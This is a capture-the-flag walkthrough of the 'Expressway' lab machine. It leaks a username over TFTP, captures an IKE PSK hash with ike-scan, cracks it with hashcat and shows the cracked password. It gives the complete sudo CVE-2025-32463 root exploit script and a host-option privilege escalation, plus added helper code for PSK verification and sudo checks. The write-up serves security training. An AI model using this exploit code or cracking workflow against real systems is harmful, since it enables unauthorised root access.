Expressway
Foothold
We run nmap against the TCP ports and only port 22 is open. We then try a UDP scan of the top 25 ports, which yields the following
sudo nmap -sC -sU --top-ports 25 -vv 10.10.11.87
[...]
PORT STATE SERVICE REASON
53/udp closed domain port-unreach ttl 63
67/udp closed dhcps port-unreach ttl 63
68/udp open|filtered dhcpc no-response
69/udp open tftp script-set
| tftp-version:
| cpe:
| cpe:/a:netkit:netkit
| cpe:/a:lefebvre:atftpd
|_ p: Netkit tftpd or atftpd
111/udp closed rpcbind port-unreach ttl 63
[...]
500/udp open isakmp udp-response ttl 63
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
514/udp closed syslog port-unreach ttl 63
[...]
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 89.57 seconds
Raw packets sent: 227 (13.674KB) | Rcvd: 50 (4.282KB)
The open ports turn out to be 69 TFTP and 500 ISAKMP.
Let’s try the TFTP service. TFTP, short for Trivial File Transfer Protocol, is a simple, lightweight network protocol for transferring files. Running the nmap script that enumerates files over TFTP reveals a file named ciscortr.cfg.
sudo nmap -sU -p 69 --script tftp-enum IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 15:58 CEST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for expressway.htb (IP)
Host is up (0.053s latency).
PORT STATE SERVICE
69/udp open tftp
| tftp-enum:
|_ ciscortr.cfg
Nmap done: 1 IP address (1 host up) scanned in 44.35 seconds
We also run the Metasploit auxiliary module scanner/tftp/tftpbrute
msf auxiliary(scanner/tftp/tftpbrute) > options
Module options (auxiliary/scanner/tftp/tftpbrute):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
DICTIONARY /usr/share/metasploit-framewor yes The list of filenames
k/data/wordlists/tftp.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/d
ocs/using-metasploit/basics/using-metasploit.html
RPORT 69 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf auxiliary(scanner/tftp/tftpbrute) > set RHOSTS 10.10.11.87
RHOSTS => 10.10.11.87
msf auxiliary(scanner/tftp/tftpbrute) > run
[+] Found ciscortr.cfg on 10.10.11.87
[+] Found default.bin on 10.10.11.87
[+] Found lync.cfg on 10.10.11.87
[+] Found video-integration.cfg on 10.10.11.87
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The only file actually available is ciscortr.cfg; the others are false positives.
This file contains various pieces of information. The only one that seems important is a username (which might also exist on the machine itself)
username ike password *****
At this point we move on to the isakmp service on port 500 and launch ike-scan in aggressive mode, so that if the server has Aggressive Mode enabled it replies with useful information.
sudo ike-scan -A IP
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
IP Aggressive Mode Handshake returned HDR=(CKY-R=74af0fb9c18517a6) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.277 seconds (3.61 hosts/sec). 1 returned handshake; 0 returned notify
We can see that weak algorithms are in use (3DES + SHA1) with PSK authentication; we also obtain the ID ike@expressway.htb and other useful information.
Running the command with the -P flag, the proposal list is generated and, when a complete handshake is received, a line called “IKE PSK parameters” is also written, in which the public fields of the Aggressive Mode exchange are concatenated.
ike-scan -A -Ppsk.txt 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=22ad962678c7ae5b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.088 seconds (11.38 hosts/sec). 1 returned handshake; 0 returned notify
The psk.txt file therefore contains one hash line made up of the fields mentioned above.
cat psk.txt
d23eed9e20ad2cc77d7d26503913843a5eb16fec948a105b352ca7267bb4f3df291013bb8e814662dfb83b27ccbfb256d6cfe7a0eca13e5be6f1e477568b9b9d0739cc2cf7de677506977785ed4273e73a9921161ee6519642122ef0f9adf3219cf6b0763bc89cec866970ea09d8b6637277ccbe7ec4c60a8d991ac8909d9d3c:a1dd89d78fa8a408ae673d629102b287e0485a3a2e4d8f677a110db37fb6db88df59bc35fa9b44d5c072c7de117945051a6e49f449bd8464a527923d32d37db4418edb60652c221312ac88f75eaa19d6beab55e8eaee1af8e6e9efa23358bbc12ade25d86a0e0c82c1ad1996b78095a4d3bb2599399461fc2c04150f2a3fd9ff:22ad962678c7ae5b:d40bda560f026f79:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:91b3419449cc8ecabb5204f8c2615b246b8e004f:56b7eeadf62ab4727b4927b1a35346697fd360c84e78e7e659e5587fa9c59427:4ee76074f1d3f57b74f7655de70a3466393c20de
So, using hashcat, we can try to recover the pre-shared key, which is the only secret input to the derivation that produced the hash from this public data.
hashcat.exe ../psk.txt "path\to\rockyou.txt"
hashcat (v7.1.2) starting in autodetect mode
OpenCL API (OpenCL 3.0 ) - Platform #1 [Intel(R) Corporation]
=============================================================
* Device #01: Intel(R) Iris(R) Xe Graphics, 3548/7096 MB (1774 MB allocatable), 8MCU
[...]:freakingrockstarontheroad
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5400 (IKE-PSK SHA1)
Hash.Target......: d23eed9e20ad2cc77d7d26503913843a5eb16fec948a105b352...3c20de
Time.Started.....: Tue Oct 07 11:22:10 2025 (2 secs)
Time.Estimated...: Tue Oct 07 11:22:12 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
[...]
Started: Tue Oct 07 11:21:12 2025
Stopped: Tue Oct 07 11:22:12 2025
A password was obtained, so the credentials we now have are
ike:freakingrockstarontheroad
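To make concrete what hashcat mode 5400 verifies from that psk.txt line, here is an added Python example (not code from the original writeup): it parses the ike-scan --pskcrack field order g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r and recomputes HASH_R per RFC 2409 with HMAC-SHA1 for a candidate key, which is why a PSK-authenticated Aggressive Mode responder hands out an offline-checkable hash. The demo exchange values are constructed; pointing the script at a real psk.txt is an assumed usage.

```python
import hashlib
import hmac
import sys

# Field order of an ike-scan --pskcrack line (the format hashcat mode 5400 consumes).
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def parse_psk_line(line):
    """Split one psk.txt line into its nine hex fields and decode them to bytes."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))


def compute_hash_r(f, psk):
    """RFC 2409 section 5.4 with prf = HMAC-SHA1 (the negotiated SA above uses SHA1).

    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Every input except the PSK travels in the clear in Aggressive Mode, so the
    responder's HASH_R can be checked offline against any candidate key.
    """
    skeyid = hmac.new(psk, f["ni_b"] + f["nr_b"], hashlib.sha1).digest()
    msg = f["g_xr"] + f["g_xi"] + f["cky_r"] + f["cky_i"] + f["sai_b"] + f["idir_b"]
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def psk_matches(line, candidate):
    """True if `candidate` is the PSK that produced the HASH_R recorded in `line`."""
    f = parse_psk_line(line)
    return hmac.compare_digest(compute_hash_r(f, candidate.encode()), f["hash_r"])


def build_sample_line(psk):
    """Construct a synthetic psk.txt line whose HASH_R was made with `psk` (demo values only)."""
    f = {
        "g_xr": bytes(range(128)),                     # 1024-bit DH public values (modp1024)
        "g_xi": bytes(range(128, 256)),
        "cky_r": bytes.fromhex("22ad962678c7ae5b"),    # responder cookie, reused from the HDR above
        "cky_i": bytes.fromhex("d40bda560f026f79"),    # initiator cookie
        "sai_b": bytes.fromhex("0000000100000001"),    # shortened SA payload body, demo only
        "idir_b": bytes.fromhex("03000000") + b"ike@expressway.htb",  # ID_USER_FQDN
        "ni_b": b"\x11" * 20,                          # ike-scan sends a 20-byte nonce
        "nr_b": b"\x22" * 32,                          # responder nonce, 32 bytes in this handshake
    }
    f["hash_r"] = compute_hash_r(f, psk.encode())
    return ":".join(f[k].hex() for k in FIELDS)


if __name__ == "__main__":
    if len(sys.argv) == 3:                # usage: script.py psk.txt 'candidate key'
        with open(sys.argv[1]) as fh:
            for n, line in enumerate(fh, 1):
                if line.strip():
                    print(f"line {n}: {'MATCH' if psk_matches(line, sys.argv[2]) else 'no match'}")
    else:
        demo = build_sample_line("demo-psk")
        print(psk_matches(demo, "demo-psk"), psk_matches(demo, "wrong-psk"))  # True False
```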
At this point we try these credentials over SSH
ssh ike@10.10.11.87
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
ike@10.10.11.87's password:
Last login: Tue Oct 7 09:48:45 BST 2025 from 10.10.14.50 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 7 10:22:57 2025 from 10.10.14.147
ike@expressway:~$
Foothold obtained.
Privilege Escalation
Solution 1
After downloading the linpeas.sh script onto the victim machine, we notice that the installed sudo is a version vulnerable to CVE-2025-32463.
╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.17
The vulnerability allows unprivileged users to make Sudo call chroot() on a writable, untrusted path under their control, a call Sudo performs with root authority.
The exploit PoC shown below therefore lets us perform the privilege escalation.
```bash
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
```
Creating the script on the target and running it gives
ike@expressway:/tmp$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
Now let’s grab and submit the root.txt flag.
Solution 2
Running the following command gives a response that differs from the usual “not in sudoers” text:
ike@expressway:~$ sudo -l
[sudo] password for ike: <redacted>
Sorry, user ike may not run sudo on expressway.
To verify whether a custom build of sudo is in use, we run
ike@expressway:~$ which sudo
/usr/local/bin/sudo
So we are dealing with a custom SUID-root binary.
Since our user is also a member of the proxy group, we check the logs, in particular those of squid.
ike@expressway:~$ ls -l /var/log/squid
-rw-r--r-- 1 proxy proxy 4778 Jul 23 01:19 access.log.1
ike@expressway:~$ cat /var/log/squid/access.log.1
...
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
...
Reading the logs, we immediately notice the presence of an internal subdomain offramp.expressway.htb.
Putting the pieces together, we suspect that sudo has a hostname-based policy. In fact, running the following command
ike@expressway:/tmp$ /usr/local/bin/sudo -h offramp.expressway.htb -i
root@expressway:~#
Note: searching for vulnerabilities in sudo 1.9.17 turns up CVE-2025-32462, which is the issue this exploit relies on. A PoC for the CVE in question is also available here.
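As an added defender-side check for the two sudo issues above (this is not code from the original writeup): it parses the sudo -V version string, compares it with 1.9.17p1, the release that fixed both CVE-2025-32462 and CVE-2025-32463 (the affected ranges used here are an assumption taken from the sudo advisories), reports which sudo binary is first on PATH, and lists sudoers rules scoped to a host other than the local one, which is the kind of rule the -h option abuses. The sudoers text is a constructed sample, not the machine's real file.

```python
import re
import shutil
import subprocess

FIXED = (1, 9, 17, 1)  # sudo 1.9.17p1 fixes both issues
# Affected ranges per the sudo advisories (lower bound inclusive, upper bound exclusive).
AFFECTED = {
    "CVE-2025-32462 (host option)": ((1, 8, 8, 0), FIXED),
    "CVE-2025-32463 (chroot option)": ((1, 9, 14, 0), FIXED),
}
SKIP = ("#", "Defaults", "Host_Alias", "User_Alias", "Cmnd_Alias", "Runas_Alias")
RULE = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(.+)$")   # User_List Host_List = spec


def parse_sudo_version(text):
    """'Sudo version 1.9.17p1' -> (1, 9, 17, 1); a missing 'pN' suffix means patch level 0."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no sudo version found in: " + text.strip())
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def affected_cves(version):
    """Names of the advisories whose affected range contains `version`."""
    return [name for name, (lo, hi) in AFFECTED.items() if lo <= version < hi]


def host_scoped_rules(sudoers_text, local_host):
    """Rules whose Host_List names a host other than ALL or this machine."""
    found = []
    for line in sudoers_text.splitlines():
        s = line.strip()
        if not s or s.startswith(SKIP):
            continue
        m = RULE.match(s)
        if not m:
            continue
        user, hosts, spec = m.groups()
        foreign = [h for h in hosts.split(",") if h not in ("ALL", local_host)]
        if foreign:
            found.append((user, foreign, spec))
    return found


SAMPLE_SUDOERS = """\
# constructed sample, not the machine's real sudoers
Defaults env_reset
root ALL=(ALL:ALL) ALL
ike offramp.expressway.htb = (ALL) ALL
%admin ALL=(ALL) ALL
"""

if __name__ == "__main__":
    # A sudo under /usr/local/bin shadowing /usr/bin/sudo deserves a second look.
    print("sudo resolved to:", shutil.which("sudo"))
    try:
        out = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
        ver = parse_sudo_version(out)
        print("version", ver, "affected by:", affected_cves(ver) or "nothing known")
    except (FileNotFoundError, ValueError) as exc:
        print("could not determine sudo version:", exc)
    for user, hosts, spec in host_scoped_rules(SAMPLE_SUDOERS, "expressway"):
        print(f"host-scoped rule: {user} on {','.join(hosts)} -> {spec}")
```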